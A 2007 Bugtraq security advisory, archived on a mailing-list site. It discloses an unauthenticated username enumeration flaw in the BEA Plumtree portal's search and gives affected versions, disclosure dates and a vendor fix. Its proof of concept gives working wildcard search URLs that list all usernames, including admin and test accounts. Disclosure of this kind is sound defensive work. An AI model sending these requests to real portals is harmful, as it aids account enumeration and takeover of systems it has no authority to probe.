lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: 1 Dec 2007 21:32:37 -0000
From: research@...checkup.com
To: bugtraq@...urityfocus.com
Subject: PR06-11: BEA Plumtree portal search facility leaks usernames to
 unauthenticated users

PR06-11: BEA Plumtree portal search facility leaks usernames to unauthenticated users

Description:

BEA Plumtree portal 6.0 is vulnerable to username leakage through the search facility.

By performing an advanced search, unauthenticated users can enumerate valid usernames with a single HTTP request. Wildcards are allowed in searches, which means that substrings can be used in order to target specific username types such as admin usernames and test usernames.

Note: this username enumeration weakness _doesn't_ require attackers to perform dictionary or bruteforce attacks in order to obtain usernames.

Date Found: 12th September 2006

Vendor contacted: 18th May 2007

Vulnerable: BEA Plumtree 5.0.2, 5.0.3, 5.0.4, 6.0.1.218452 and possibly other versions.

Severity: Medium

Authors: Adrian Pastor, Jan Fry and Richard Brain of ProCheckUp Ltd (www.procheckup.com)

ProCheckUp thanks BEA for working with us.

Proof of concept:

The following requests all usernames ('*' wildcard), showing a maximum of 100 usernames per page:

https://[hostname]/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*&in_hi_req_apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_topoperator=and

The wildcard '*' character can also be combined in the 'in_tx_fulltext' parameter with strings.

The following request enumerates usernames that contain the substring 'admin' within them:

https://[hostname]/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*admin*&in_hi_req_apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_topoperator=and

The following request enumerates usernames that contain the substring 'test' within them:

https://[hostname]/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*test*&in_hi_req_apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_topoperator=and

Consequences:

Valid usernames can be easily enumerated by attackers. This includes usernames with administrative privileges on Plumtree portal. Considering that Plumtree portal setups don't enforce password complexity requirements, and many usernames are usually available, it is highly likely that an attacker can hijack accounts that use easy-to-guess passwords.

Fix: this has been addressed in AquaLogic Interaction 6.1. MP1. This can also be addressed by making config changes in ALUI 6.x versions.

References:

http://www.procheckup.com/Vulnerability_2007.php
http://dev2dev.bea.com/pub/advisory/254
http://www.plumtree.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ